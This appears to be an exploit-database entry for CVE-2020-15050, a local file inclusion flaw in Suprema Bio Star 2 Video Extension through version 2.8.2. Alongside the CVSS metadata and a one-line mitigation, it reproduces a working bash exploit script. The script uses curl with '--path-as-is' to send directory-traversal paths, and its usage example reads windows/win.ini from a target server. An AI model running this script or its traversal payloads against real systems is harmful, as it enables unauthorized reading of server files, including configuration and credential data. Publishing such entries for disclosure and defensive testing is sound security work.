header-logo
Suggest Exploit
vendor:
Bio Star
by:
SITE Team
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Bio Star
Affected Version From: Up to version 2.8.2
Affected Version To: Up to version 2.8.2
Patch Exists: NO
Related CWE: CVE-2020-15050
CPE: a:suprema:bio_star:2.8.2
Metasploit:
Other Scripts:
Tags: suprema,biostar2,packetstorm,cve,cve2020,lfi
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'supremainc', 'product': 'biostar_2'}
Platforms Tested: Windows
2020

Bio Star 2.8.2 – Local File Inclusion

This exploit allows an attacker to include local files on the Bio Star 2 system. It affects Bio Star 2, Video Extension up to version 2.8.2.

Mitigation:

Apply the vendor's patch or upgrade to a fixed version.
Source

Exploit-DB raw data:

# Exploit Title: Bio Star 2.8.2 - Local File Inclusion
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 2020-07-13
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.2
# Tested on: Windows
# CVE : CVE-2020-15050


#!/bin/bash

# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
# Google Dork: N/A
# Date of Exploit Release: 13/7/2020
# Exploit Author: SITE Team
# Vendor Homepage: https://www.supremainc.com/en/main.asp
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
# Version: Bio Star 2, Video Extension up to version 2.8.1
# Tested on: Windows
# CVE : CVE-2020-15050

echo "*********** SITE TEAM *********************"
echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"
echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi  *********************"

 if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"
echo "*******************************************"
else
args=("$@")
curl -X GET --path-as-is -k  ${args[0]}${args[1]}
fi